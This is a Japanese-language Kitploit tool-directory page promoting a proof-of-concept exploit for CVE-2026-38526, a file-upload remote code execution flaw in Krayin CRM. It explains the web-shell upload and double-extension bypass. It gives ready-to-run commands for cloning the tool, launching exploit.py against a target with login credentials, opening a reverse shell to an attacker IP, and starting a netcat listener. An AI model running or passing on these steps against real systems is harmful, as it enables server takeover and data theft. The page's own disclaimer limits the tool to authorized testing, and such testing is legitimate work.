Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-38526-POC — Krayin CRM <= v2.2.x における CVE-2026-38526 の概念実証。任意のファイルアップロードによるリモートコード実行。 | Kitploit
ツール/GitHubGitHub/pawpic/cve-2026-38526-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Krayin CRM <= v2.2.x における CVE-2026-38526 の概念実証。任意のファイルアップロードによるリモートコード実行。

リポジトリを見る
21ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38526 - Krayin CRM RCEエクスプロイト

Krayin CRM (≤ 2.2.x) - 無制限のファイルアップロードによるリモートコード実行。

このPoCは、脆弱なTinyMCEアップロードエンドポイント(/admin/tinymce/upload)を悪用してPHPウェブシェルをアップロードし、サーバー上でコマンド実行を実現します。


機能

  • CSRFトークン処理による完全自動ログイン
  • 二重拡張子を使用してアップロード制限をバイパス
  • リバースシェルと単一コマンド実行をサポート
  • 信頼性の高いLaravel CSRFトークンのリフレッシュ
  • クリーンで使いやすい

ダウンロード

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

要件

root@kitploit:~
pip3 install requests beautifulsoup4

使用方法

  1. リバースシェル(デフォルト&推奨)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. 単一コマンド
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

オプション

使用例

リスナーを起動:

root@kitploit:~
nc -lvnp 4444

エクスプロイトを実行:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

免責事項

このエクスプロイトは教育目的および許可されたペネトレーションテスト専用です。明示的な許可なくシステムに対して使用することは違法です。

影響を受けるバージョン

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

作者: pawpic 日付: 2026

ツールをダウンロード
引数説明必須
-u, --url対象ベースURLはい
-e, --emailログインメールアドレスはい
-p, --passwordログインパスワードはい
-c, --cmd単一コマンドを実行いいえ
--lhostリバースシェル用の自分のIPはい(--cmd未使用の場合)
--lportリスニングポートいいえ(デフォルト: 4444)